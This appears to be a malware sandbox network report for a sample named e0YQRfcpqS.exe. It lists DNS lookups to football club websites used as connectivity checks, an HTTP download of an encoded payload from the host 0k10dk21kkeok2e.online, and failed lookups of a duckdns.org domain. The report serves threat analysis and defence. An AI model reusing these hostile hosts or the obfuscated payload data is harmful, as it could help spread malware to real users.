                                                                                                                                                                                            Mar 2, 2021 20:35:53.060678959 CET192.168.2.58.8.8.80x2583Standard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.121392012 CET192.168.2.58.8.8.80x444bStandard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.271282911 CET192.168.2.58.8.8.80x8aadStandard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.332206964 CET192.168.2.58.8.8.80xf43fStandard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.495837927 CET192.168.2.58.8.8.80xae45Standard query (0)0k10dk21kkeok2e.onlineA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.484817982 CET192.168.2.58.8.8.80x255fStandard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.547835112 CET192.168.2.58.8.8.80x810aStandard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.710885048 CET192.168.2.58.8.8.80x3eeStandard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.778197050 CET192.168.2.58.8.8.80x6b11Standard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:55.625775099 CET192.168.2.58.8.8.80xdcaaStandard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:55.683742046 CET192.168.2.58.8.8.80x738Standard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:55.829713106 CET192.168.2.58.8.8.80x5718Standard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:55.885040998 CET192.168.2.58.8.8.80xbb8aStandard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:36:08.014620066 CET192.168.2.58.8.8.80xdf51Standard query (0)aca1cab2451.duckdns.orgA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:36:08.285960913 CET192.168.2.58.8.8.80x6aabStandard query (0)aca1cab2451.duckdns.orgA (IP address)IN (0x0001)

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                            Mar 2, 2021 20:35:49.345875978 CET8.8.8.8192.168.2.50x3eefNo error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.345875978 CET8.8.8.8192.168.2.50x3eefNo error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.345875978 CET8.8.8.8192.168.2.50x3eefNo error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.345875978 CET8.8.8.8192.168.2.50x3eefNo error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.345875978 CET8.8.8.8192.168.2.50x3eefNo error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.405198097 CET8.8.8.8192.168.2.50xa36aNo error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.405198097 CET8.8.8.8192.168.2.50xa36aNo error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.405198097 CET8.8.8.8192.168.2.50xa36aNo error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.405198097 CET8.8.8.8192.168.2.50xa36aNo error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.405198097 CET8.8.8.8192.168.2.50xa36aNo error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.576670885 CET8.8.8.8192.168.2.50xabc8No error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.576670885 CET8.8.8.8192.168.2.50xabc8No error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.576670885 CET8.8.8.8192.168.2.50xabc8No error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.576670885 CET8.8.8.8192.168.2.50xabc8No error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.576670885 CET8.8.8.8192.168.2.50xabc8No error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.641621113 CET8.8.8.8192.168.2.50xf8e7No error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.641621113 CET8.8.8.8192.168.2.50xf8e7No error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.641621113 CET8.8.8.8192.168.2.50xf8e7No error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.641621113 CET8.8.8.8192.168.2.50xf8e7No error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.641621113 CET8.8.8.8192.168.2.50xf8e7No error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.805087090 CET8.8.8.8192.168.2.50xb205No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.861460924 CET8.8.8.8192.168.2.50x8a83No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:50.016735077 CET8.8.8.8192.168.2.50x90b8No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:50.077478886 CET8.8.8.8192.168.2.50x8691No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.115252972 CET8.8.8.8192.168.2.50x2583No error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.170370102 CET8.8.8.8192.168.2.50x444bNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.325862885 CET8.8.8.8192.168.2.50x8aadNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.391866922 CET8.8.8.8192.168.2.50xf43fNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.555145979 CET8.8.8.8192.168.2.50xae45No error (0)0k10dk21kkeok2e.online172.67.179.188A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:53.555145979 CET8.8.8.8192.168.2.50xae45No error (0)0k10dk21kkeok2e.online104.21.59.148A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.536602020 CET8.8.8.8192.168.2.50x255fNo error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.536602020 CET8.8.8.8192.168.2.50x255fNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.536602020 CET8.8.8.8192.168.2.50x255fNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.536602020 CET8.8.8.8192.168.2.50x255fNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.536602020 CET8.8.8.8192.168.2.50x255fNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.599256039 CET8.8.8.8192.168.2.50x810aNo error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.599256039 CET8.8.8.8192.168.2.50x810aNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.599256039 CET8.8.8.8192.168.2.50x810aNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.599256039 CET8.8.8.8192.168.2.50x810aNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.599256039 CET8.8.8.8192.168.2.50x810aNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.769732952 CET8.8.8.8192.168.2.50x3eeNo error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.769732952 CET8.8.8.8192.168.2.50x3eeNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.769732952 CET8.8.8.8192.168.2.50x3eeNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.769732952 CET8.8.8.8192.168.2.50x3eeNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.769732952 CET8.8.8.8192.168.2.50x3eeNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.851455927 CET8.8.8.8192.168.2.50x6b11No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.851455927 CET8.8.8.8192.168.2.50x6b11No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.851455927 CET8.8.8.8192.168.2.50x6b11No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.851455927 CET8.8.8.8192.168.2.50x6b11No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:54.851455927 CET8.8.8.8192.168.2.50x6b11No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:55.675307989 CET8.8.8.8192.168.2.50xdcaaNo error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:55.737142086 CET8.8.8.8192.168.2.50x738No error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:55.877684116 CET8.8.8.8192.168.2.50x5718No error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:55.946156979 CET8.8.8.8192.168.2.50xbb8aNo error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:36:08.238080978 CET8.8.8.8192.168.2.50xdf51Name error (3)aca1cab2451.duckdns.orgnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:36:08.509561062 CET8.8.8.8192.168.2.50x6aabName error (3)aca1cab2451.duckdns.orgnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • www.chelseafc.com
                                                                                                                                                                                            • 0k10dk21kkeok2e.online
                                                                                                                                                                                            • www.liverpoolfc.com

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            0192.168.2.549714151.101.2.13380C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Mar 2, 2021 20:35:49.462201118 CET1002OUTGET / HTTP/1.1
                                                                                                                                                                                            User-Agent: Other
                                                                                                                                                                                            Host: www.chelseafc.com
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Mar 2, 2021 20:35:49.503057957 CET1002INHTTP/1.1 302 Found
                                                                                                                                                                                            Retry-After: 0
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Location: https://www.chelseafc.com/en
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Tue, 02 Mar 2021 19:35:49 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding, Accept-Language
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            X-Powered-By: Curiosity
                                                                                                                                                                                            X-Geo-Country_code: CH


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            1192.168.2.549720172.67.179.18880C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Mar 2, 2021 20:35:53.605760098 CET2183OUTGET /base/C3A1798AE90316BAA425420BB0F9E3EA.html HTTP/1.1
                                                                                                                                                                                            User-Agent: Other
                                                                                                                                                                                            Host: 0k10dk21kkeok2e.online
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818006992 CET2184INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Tue, 02 Mar 2021 19:35:53 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Set-Cookie: __cfduid=de601cfd894e7a52e3f504937d9a7602f1614713753; expires=Thu, 01-Apr-21 19:35:53 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax
                                                                                                                                                                                            Last-Modified: Tue, 02 Mar 2021 05:43:59 GMT
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            cf-request-id: 089609a8280000e68419263000000001
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2hK4mf58SEuDNvkJEogSfJr7OGAn4eAp0Y1qYqQV0y%2FRCvoODvkqKrqZpM%2B9%2BBu5TmqEu5MencWPZ1yiy4POzsxRxsrcZP9wRIrHXizF%2BhZa96RTCeVC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 629d12203f35e684-LHR
                                                                                                                                                                                            alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                            Data Raw: 37 63 38 30 0d 0a 3c 70 3e 67 67 50 51 64 50 41 6d 6d 50 64 50 76 50 64 50 64 50 64 50 6d 50 64 50 64 50 64 50 58 4c 4c 50 58 4c 4c 50 64 50 64 50 41 7a 6d 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 69 6d 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 41 58 7a 50 64 50 64 50 64 50 41 6d 50 76 41 50 41 7a 69 50 41 6d 50 64 50 41 7a 64 50 51 50 58 64 4c 50 76 76 50 41 7a 6d 50 41 50 67 69 50 58 64 4c 50 76 76 50 7a 6d 50 41 64 6d 50 41 64 4c 50 41 41 4c 50 76 58 50 41 41 58 50 41 41 6d 50 41 41 41 50 41 64 76 50 41 41 6d 50 51 67 50 41 64 51 50 76 58 50 51 51 50 51 67 50 41 41 64 50 41 41 64 50 41 41 41 50 41 41 69 50 76 58 50 51 7a 50 41 64 41 50 76 58 50 41 41 6d 50 41 41 67 50 41 41 64 50 76 58 50 41 64 4c 50 41 41 64 50 76 58 50 69 7a 50 67 51 50 7a 76 50 76 58 50 41 64 51 50 41 41 41 50 41 64 64 50 41 64 41 50 6d 69 50 41 76 50 41 76 50 41 64 50 76 69 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 7a 64 50 69 51 50 64 50 64 50 67 69 50 41 50 76 50 64 50 51 67 50 41 76 7a 50 41 4c 7a 50 58 58 69 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 58 58 6d 50 64 50 76 6d 50 64 50 41 41 50 41 50 7a 64 50 64 50 64 50 6d 7a 50 58 50 64 50 64 50 69 50 64 50 64 50 64 50
                                                                                                                                                                                            Data Ascii: 7c80<p>ggPQdPAmmPdPvPdPdPdPmPdPdPdPXLLPXLLPdPdPAzmPdPdPdPdPdPdPdPimPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPdPAXzPdPdPdPAmPvAPAziPAmPdPAzdPQPXdLPvvPAzmPAPgiPXdLPvvPzmPAdmPAdLPAALPvXPAAXPAAmPAAAPAdvPAAmPQgPAdQPvXPQQPQgPAAdPAAdPAAAPAAiPvXPQzPAdAPvXPAAmPAAgPAAdPvXPAdLPAAdPvXPizPgQPzvPvXPAdQPAAAPAddPAdAPmiPAvPAvPAdPviPdPdPdPdPdPdPdPzdPiQPdPdPgiPAPvPdPQgPAvzPALzPXXiPdPdPdPdPdPdPdPdPXXmPdPvmPdPAAPAPzdPdPdPmzPXPdPdPiPdPdPdP
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818049908 CET2186INData Raw: 64 50 64 50 64 50 41 67 6d 50 67 7a 50 58 50 64 50 64 50 76 58 50 64 50 64 50 64 50 51 69 50 58 50 64 50 64 50 64 50 64 50 41 69 50 64 50 76 58 50 64 50 64 50 64 50 58 50 64 50 64 50 6d 50 64 50 64 50 64 50 64 50 64 50 64 50 64 50 69 50 64 50 64
                                                                                                                                                                                            Data Ascii: dPdPdPAgmPgzPXPdPdPvXPdPdPdPQiPXPdPdPdPdPAiPdPvXPdPdPdPXPdPdPmPdPdPdPdPdPdPdPiPdPdPdPdPdPdPdPdPAidPXPdPdPXPdPdPdPdPdPdPXPdPQiPAvvPdPdPAiPdPdPAiPdPdPdPdPAiPdPdPAiPdPdPdPdPdPdPAiPdPdPdPdPdPdPdPdPdPdPdPQXPgzPXPdPgQPdPdPdPdPQiPXPdPAimPvPdPdPdPdPdP
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818070889 CET2187INData Raw: 6d 64 50 41 41 50 64 50 64 50 6d 76 50 41 58 7a 50 58 51 50 64 50 64 50 6d 50 6d 64 50 41 7a 50 64 50 64 50 69 50 6d 64 50 41 51 50 64 50 64 50 69 50 6d 64 50 41 58 50 64 50 64 50 6d 76 50 41 58 7a 50 76 64 50 64 50 64 50 6d 50 6d 64 50 58 64 50
                                                                                                                                                                                            Data Ascii: mdPAAPdPdPmvPAXzPXQPdPdPmPmdPAzPdPdPiPmdPAQPdPdPiPmdPAXPdPdPmvPAXzPvdPdPdPmPmdPXdPdPdPiPmdPXAPdPdPiPmdPAvPdPdPmvPAXzPvAPdPdPmPmXPAiiPmdPLgPdPdPAdPmdPXXPdPdPiPAAAPLzPdPdPAdPAXzPvXPdPdPmPmdPLQPdPdPAdPAXzPvvPdPdPmPAALPidPdPdPAdPAXzPvmPdPdPmPmXPvd
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818089962 CET2188INData Raw: 58 64 50 58 4c 6d 50 41 58 50 76 50 64 50 41 41 41 50 76 64 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 64 50 64 50 4c 69 50 64 50 64 50 64 50 64 50 58 4c 6d 50 41 58 50 64 50 64 50 6d 58 50 64 50 64 50 41 50 41 69 50 64 50 64 50 58 50 64 50 58
                                                                                                                                                                                            Data Ascii: XdPXLmPAXPvPdPAAAPvdPdPdPAdPXLmPAmPdPdPLiPdPdPdPdPXLmPAXPdPdPmXPdPdPAPAiPdPdPXPdPXzPdPAdiPAvmPdPAgPdPdPdPdPXgPmzPXPdPAgmPdPdPdPAPdPdPAgPdPAAmPgAPdPdPAAXPXLmPAmPAPdPAAmPAALPdPdPAAXPXLmPAmPXPdPAALPXdPdPdPAdPXLmPAmPvPdPXLmPAXPAPdPmdPAPdPdPmvPAAAP
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818113089 CET2190INData Raw: 6d 76 50 41 41 41 50 58 58 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 6d 50 64 50 4c 69 50 4c 69 50 64 50 64 50 64 50 58 4c 6d 50 41 76 50 6d 50 64 50 6d 64 50 58 76 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 4c 50 64 50 58 4c 6d 50 41 58 50
                                                                                                                                                                                            Data Ascii: mvPAAAPXXPdPdPAdPXLmPAmPmPdPLiPLiPdPdPdPXLmPAvPmPdPmdPXvPdPdPAdPXLmPAmPLPdPXLmPAXPLPdPmdPXmPdPdPAdPXLmPAXPXPdPmdPXLPdPdPAdPXAzPXLmPAmPiPdPXLmPAXPvPdPXLmPAXPiPdPmdPXiPdPdPAdPAAAPXgPdPdPAdPvzPdPXLmPAvPmPdPmdPXzPdPdPAdPXLmPAmPgPdPXLmPAXPgPdPLzPAg
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818135977 CET2191INData Raw: 4c 7a 50 41 67 7a 50 58 4c 4c 50 58 4c 4c 50 58 4c 4c 50 58 58 41 50 41 67 50 64 50 64 50 64 50 58 4c 6d 50 41 76 50 6d 50 64 50 58 4c 6d 50 58 58 50 58 50 64 50 64 50 58 67 50 41 41 41 50 58 51 50 64 50 64 50 41 64 50 64 50 58 58 64 50 58 4c 6d
                                                                                                                                                                                            Data Ascii: LzPAgzPXLLPXLLPXLLPXXAPAgPdPdPdPXLmPAvPmPdPXLmPXXPXPdPdPXgPAAAPXQPdPdPAdPdPXXdPXLmPAXPvPdPAAAPvdPdPdPAdPXLmPAmPdPdPLiPdPdPdPdPXLmPAXPdPdPmXPdPdPAPAiPdPdPXPdPXzPdPAdiPAvmPdPAgPdPdPdPdPXgPmzPXPdPAgmPdPdPdPAPdPdPAgPdPAAmPAgPAPdPAAXPXLmPAmPAPdPAAm
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818157911 CET2192INData Raw: 41 41 6d 50 41 41 4c 50 41 50 64 50 41 41 58 50 58 4c 6d 50 41 6d 50 58 50 64 50 41 41 4c 50 58 64 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 76 50 64 50 58 4c 6d 50 41 58 50 41 50 64 50 6d 64 50 41 50 64 50 64 50 6d 76 50 41 41 41 50 58 58 50
                                                                                                                                                                                            Data Ascii: AAmPAALPAPdPAAXPXLmPAmPXPdPAALPXdPdPdPAdPXLmPAmPvPdPXLmPAXPAPdPmdPAPdPdPmvPAAAPXXPdPdPAdPXLmPAmPmPdPLiPLiPdPdPdPXLmPAvPmPdPmdPXvPdPdPAdPXLmPAmPLPdPXLmPAXPLPdPmdPXmPdPdPAdPXLmPAXPXPdPmdPXLPdPdPAdPXAzPXLmPAmPiPdPXLmPAXPvPdPXLmPAXPiPdPmdPXiPdPdPA
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818181038 CET2194INData Raw: 69 50 64 50 64 50 41 64 50 41 41 41 50 58 67 50 64 50 64 50 41 64 50 76 7a 50 64 50 58 4c 6d 50 41 76 50 6d 50 64 50 6d 64 50 58 7a 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 67 50 64 50 58 4c 6d 50 41 58 50 67 50 64 50 4c 7a 50 41 67 7a 50 58
                                                                                                                                                                                            Data Ascii: iPdPdPAdPAAAPXgPdPdPAdPvzPdPXLmPAvPmPdPmdPXzPdPdPAdPXLmPAmPgPdPXLmPAXPgPdPLzPAgzPXLLPXLLPXLLPXXAPAgPdPdPdPXLmPAvPmPdPXLmPXXPXPdPdPXgPAAAPXQPdPdPAdPdPXXdPXLmPAXPvPdPAAAPvdPdPdPAdPXLmPAmPdPdPLiPdPdPdPdPXLmPAXPdPdPmXPdPdPAPAiPdPdPXPdPXzPdPAdiPAvm
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818203926 CET2195INData Raw: 69 50 41 76 6d 50 64 50 41 67 50 64 50 64 50 64 50 64 50 58 67 50 6d 7a 50 58 50 64 50 41 67 6d 50 64 50 64 50 64 50 41 50 64 50 64 50 41 67 50 64 50 41 41 6d 50 41 51 50 58 50 64 50 41 41 58 50 58 4c 6d 50 41 6d 50 41 50 64 50 41 41 6d 50 6d 51
                                                                                                                                                                                            Data Ascii: iPAvmPdPAgPdPdPdPdPXgPmzPXPdPAgmPdPdPdPAPdPdPAgPdPAAmPAQPXPdPAAXPXLmPAmPAPdPAAmPmQPXPdPAAXPXLmPAmPXPdPAALPXdPdPdPAdPXLmPAmPvPdPXLmPAXPAPdPmdPAPdPdPmvPAAAPXXPdPdPAdPXLmPAmPmPdPLiPLiPdPdPdPXLmPAvPmPdPmdPXvPdPdPAdPXLmPAmPLPdPXLmPAXPLPdPmdPXmPdPdP
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818227053 CET2196INData Raw: 64 50 64 50 41 64 50 58 4c 6d 50 41 58 50 58 50 64 50 6d 64 50 58 4c 50 64 50 64 50 41 64 50 58 41 7a 50 58 4c 6d 50 41 6d 50 69 50 64 50 58 4c 6d 50 41 58 50 76 50 64 50 58 4c 6d 50 41 58 50 69 50 64 50 6d 64 50 58 69 50 64 50 64 50 41 64 50 41
                                                                                                                                                                                            Data Ascii: dPdPAdPXLmPAXPXPdPmdPXLPdPdPAdPXAzPXLmPAmPiPdPXLmPAXPvPdPXLmPAXPiPdPmdPXiPdPdPAdPAAAPXgPdPdPAdPvzPdPXLmPAvPmPdPmdPXzPdPdPAdPXLmPAmPgPdPXLmPAXPgPdPLzPAgzPXLLPXLLPXLLPXXAPAgPdPdPdPXLmPAvPmPdPXLmPXXPXPdPdPXgPAAAPXQPdPdPAdPdPXXdPXLmPAXPvPdPAAAPvdP
                                                                                                                                                                                            Mar 2, 2021 20:35:53.819128036 CET2198INData Raw: 41 41 41 50 76 64 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 64 50 64 50 4c 69 50 64 50 64 50 64 50 64 50 58 4c 6d 50 41 58 50 64 50 64 50 6d 58 50 64 50 64 50 41 50 41 69 50 64 50 64 50 58 50 64 50 58 7a 50 64 50 41 64 69 50 41 76 6d 50 64 50
                                                                                                                                                                                            Data Ascii: AAAPvdPdPdPAdPXLmPAmPdPdPLiPdPdPdPdPXLmPAXPdPdPmXPdPdPAPAiPdPdPXPdPXzPdPAdiPAvmPdPAgPdPdPdPdPXgPmzPXPdPAgmPdPdPdPAPdPdPAgPdPAAmPXALPXPdPAAXPXLmPAmPAPdPAAmPXvvPXPdPAAXPXLmPAmPXPdPAALPXdPdPdPAdPXLmPAmPvPdPXLmPAXPAPdPmdPAPdPdPmvPAAAPXXPdPdPAdPXLm


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            2192.168.2.54972199.86.159.3480C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Mar 2, 2021 20:35:54.651071072 CET2700OUTGET / HTTP/1.1
                                                                                                                                                                                            User-Agent: Other
